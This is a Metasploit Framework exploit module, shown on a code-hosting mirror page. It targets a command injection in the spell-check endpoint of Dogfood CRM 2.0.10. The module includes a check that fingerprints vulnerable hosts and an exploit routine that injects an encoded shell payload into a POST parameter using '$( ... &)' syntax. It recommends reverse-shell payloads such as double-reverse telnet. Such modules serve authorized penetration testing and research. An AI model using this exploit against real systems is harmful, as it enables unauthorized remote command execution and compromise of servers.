Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/dogfood_spell_exec.rb
33119 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Dogfood CRM spell.php Remote Command Execution',

16
        'Description' => %q{

17
          This module exploits a previously unpublished vulnerability in the

18
          Dogfood CRM mail function which is vulnerable to command injection

19
          in the spell check feature.  Because of character restrictions, this

20
          exploit works best with the double-reverse telnet payload. This

21
          vulnerability was discovered by LSO and affects v2.0.10.

22
        },

23
        'Author' => [

24
          'LSO <lso[at]hushmail.com>', # Exploit module

25
          'aushack', # Added check code, QA tested ok 20090303, there are no references (yet).

26
        ],

27
        'License' => BSD_LICENSE,

28
        'References' => [

29
          [ 'CVE', '2009-20010' ],

30
          [ 'OSVDB', '54707' ],

31
          [ 'URL', 'http://downloads.sourceforge.net/dogfood/' ],

32
        ],

33
        'Privileged' => false,

34
        'Platform' => ['unix'], # aushack - removed win, linux -> untested

35
        'Arch' => ARCH_CMD,

36
        'Payload' => {

37
          'Space' => 1024,

38
          'DisableNops' => true,

39
          'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install

40
          'Compat' =>

41
                        {

42
                          'PayloadType' => 'cmd cmd_bash',

43
                          'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',

44
                        }

45
        },

46
        'Targets' => [ ['Automatic', {}], ],

47
        'DefaultTarget' => 0,

48
        'DisclosureDate' => '2009-03-03',

49
        'Notes' => {

50
          'Reliability' => UNKNOWN_RELIABILITY,

51
          'Stability' => UNKNOWN_STABILITY,

52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

53
        }

54
      )

55
    )

56


57
    register_options(

58
      [

59
        OptString.new('URIPATH', [ true, "The URI of the spell checker", '/dogfood/mail/spell.php']),

60
      ]

61
    )

62
  end

63


64
  def check

65
    res = send_request_raw(

66
      {

67
        'uri' => normalize_uri(datastore['URIPATH']),

68
      }, 1

69
    )

70


71
    if (res and res.body =~ /Spell Check complete/)

72
      return Exploit::CheckCode::Detected

73
    end

74


75
    return Exploit::CheckCode::Safe

76
  end

77


78
  def exploit

79
    timeout = 1

80


81
    cmd = payload.encoded

82
    data = "data=#{Rex::Text.uri_encode('$( ' + cmd + ' &)x')}"

83
    uri = normalize_uri(datastore['URIPATH'])

84


85
    response = send_request_cgi(

86
      {

87
        'uri' => uri,

88
        'method' => "POST",

89
        'data' => data

90
      },

91
      timeout

92
    )

93


94
    handler

95
  end

96
end

97


98